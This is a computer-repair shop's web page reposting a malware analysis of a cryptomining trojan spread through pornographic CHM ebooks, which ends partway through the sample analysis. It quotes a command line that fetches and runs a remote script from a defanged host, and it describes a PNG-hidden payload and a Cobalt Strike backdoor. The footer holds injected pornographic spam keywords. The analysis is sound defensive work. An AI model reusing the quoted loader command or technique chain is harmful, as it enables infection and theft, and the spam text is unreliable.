錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
挖礦木馬借“XX的秘密”等小黃書瘋傳,中毒后會劫持比特幣交易

作者: 佚名  日期:2018-06-05 10:42:53   來源: 本站整理

 一、概述
近期騰訊御見威脅情報中心捕獲到利用一堆色情類電子書(chm格式)傳播的惡意挖礦病毒,病毒使用一批極具誘惑力的文件名(本文分析樣本使用名為“想不想知道xx之間的秘密.chm”)在網(wǎng)絡(luò)中傳播。

病毒使用執(zhí)行遠程腳本的方法,并結(jié)合白利用,代碼混淆,無文件內(nèi)存裝載等技術(shù)來躲避安全廠商的查殺,受害者一旦打開這些chm格式的電子書,病毒便會隱藏進用戶機器中。
病毒目前行為主要有釋放挖礦病毒,安裝Chrome瀏覽器惡意插件,在用戶交易虛擬加密幣時劫持收款地址,盜取用戶facebook帳號信息,并自動在facebook網(wǎng)站分享若干“小黃書”chm下載鏈接實現(xiàn)蠕蟲式的傳播。

二、樣本分析
chm文檔結(jié)構(gòu)如下圖,運行chm文檔后文檔內(nèi)Load_HTML_CHM0.html內(nèi)混淆的腳本代碼會以命令行”C:\Windows\System32\wscript.exe” /b C:/Windows/System32/Printing_Admin_Scripts/zh-CN/pubprn.vbs 127.0.0.1 script:hxxp://png.realtimenews.tk/chm.sct 
來執(zhí)行hxxp://png.realtimenews.tk/chm.sct內(nèi)的遠程腳本。

腳本代碼通過訪問一個外部鏈接的圖片q.png,并查找圖片數(shù)據(jù)中的tEXt,iENd兩個標記,截取tEXt+4位置到iENd-8處的文件內(nèi)容,Base64解碼后存放到Temp目錄以tmpg.Jpg命名,并用Rundll32.exe拉起執(zhí)行,tmpg.Jpg其實為一個帶有導(dǎo)出函數(shù)VoidFunc且加殼的DLL。
截取png中隱藏數(shù)據(jù)

q.png表象上看為一個透明背景中心發(fā)亮的PNG圖片。

q.png文件tEXt+4位置指向了一個BASE64編碼的PE文件內(nèi)容開始位置.

q.png文件iENd-8指向了一個BASE64編碼的PE文件內(nèi)容末尾位置。

Rundll32.exe進一步拉起執(zhí)行tmpg.Jpg

tmpg.Jpg為帶有導(dǎo)出函數(shù)VoidFunc的DLL

被RunDll32拉起的tmpg.Jpg通過執(zhí)行導(dǎo)出函數(shù)VoidFun,然后在內(nèi)存中解密出一段Shellcode,通過CreateThread的方式執(zhí)行起來。
創(chuàng)建線程執(zhí)行Shellcode

Shellcode代碼通過遍歷LDR鏈找到kernel32模塊,然后獲取LoadLibraryA的地址,加載Wininet模塊,然后獲得一系列網(wǎng)絡(luò)操作函數(shù)
InternetConnectA,httpOpenRequestA,httpSendRequestA地址調(diào)用,最終向域名
dazqc4f140wtl.cloudfront.net發(fā)送一個Get網(wǎng)絡(luò)請求,并使用InternetReadFIle來接收網(wǎng)絡(luò)文件數(shù)據(jù)流,請求域名藏在Shellcode的尾部。
Shellcode裝載Wininet模塊

Get請求域名藏在解密后的Shellcode尾部

通過抓包工具可以直接看到,Get請求后服務(wù)器發(fā)送回來的數(shù)據(jù)流有一個明文的PE文件,通過從內(nèi)存Dump出該模塊可知該模塊還是一個DLL,并使用反射式加載的方法,實現(xiàn)該模塊代碼不落地裝載。
病毒Get請求后返回的明文PE文件數(shù)據(jù)流

反射式加載的DLL

觀察該模塊可知為Cobalt Strike生成的DLL后門攻擊模塊,該后門攻擊模塊數(shù)據(jù)交互支持HTTP、HTTPS、DNS和SMB隧道協(xié)議,本次樣本使用HTTP協(xié)議的方式進行通信交互,后門攻擊模塊首先通過異或0×69解密出上線配置信息。



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 日韩精品无码永久免费网站| 亚洲AV无码专区亚洲AV伊甸园| 亚洲成A人片在线观看无码3D| 东京热人妻无码人av| 精品无码久久久久久久动漫 | 国产AV无码专区亚洲AV漫画| 亚洲熟妇无码爱v在线观看| 无码中文人妻在线一区| 东京无码熟妇人妻AV在线网址| 亚洲AV无码国产精品色午友在线 | 粉嫩大学生无套内射无码卡视频| 精品无码一区二区三区电影| 少妇中文无码高清| 在线看无码的免费网站| 久久久久亚洲av成人无码电影| 亚洲精品无码久久久久久久| 精品久久久久久无码免费| 亚洲av成本人无码网站| 青青草无码免费一二三区| 亚洲国产精品无码专区在线观看| 亚洲av无码成人影院一区| 午夜人性色福利无码视频在线观看| 人妻老妇乱子伦精品无码专区| 亚洲av无码偷拍在线观看| 97精品人妻系列无码人妻| 无码人妻精品一区二区三区99性| 亚洲人成无码网WWW| 波多野结衣VA无码中文字幕电影| 99久久人妻无码精品系列 | 成人无码AV一区二区| 性色AV一区二区三区无码| 亚洲最大天堂无码精品区| 无码精品一区二区三区| 人妻少妇看A偷人无码精品视频| 亚洲A∨无码一区二区三区| 久久亚洲精品AB无码播放| 国产做无码视频在线观看浪潮| 亚洲av中文无码乱人伦在线播放 | 亚洲熟妇无码一区二区三区| 成人免费午夜无码视频| 亚洲日韩av无码中文|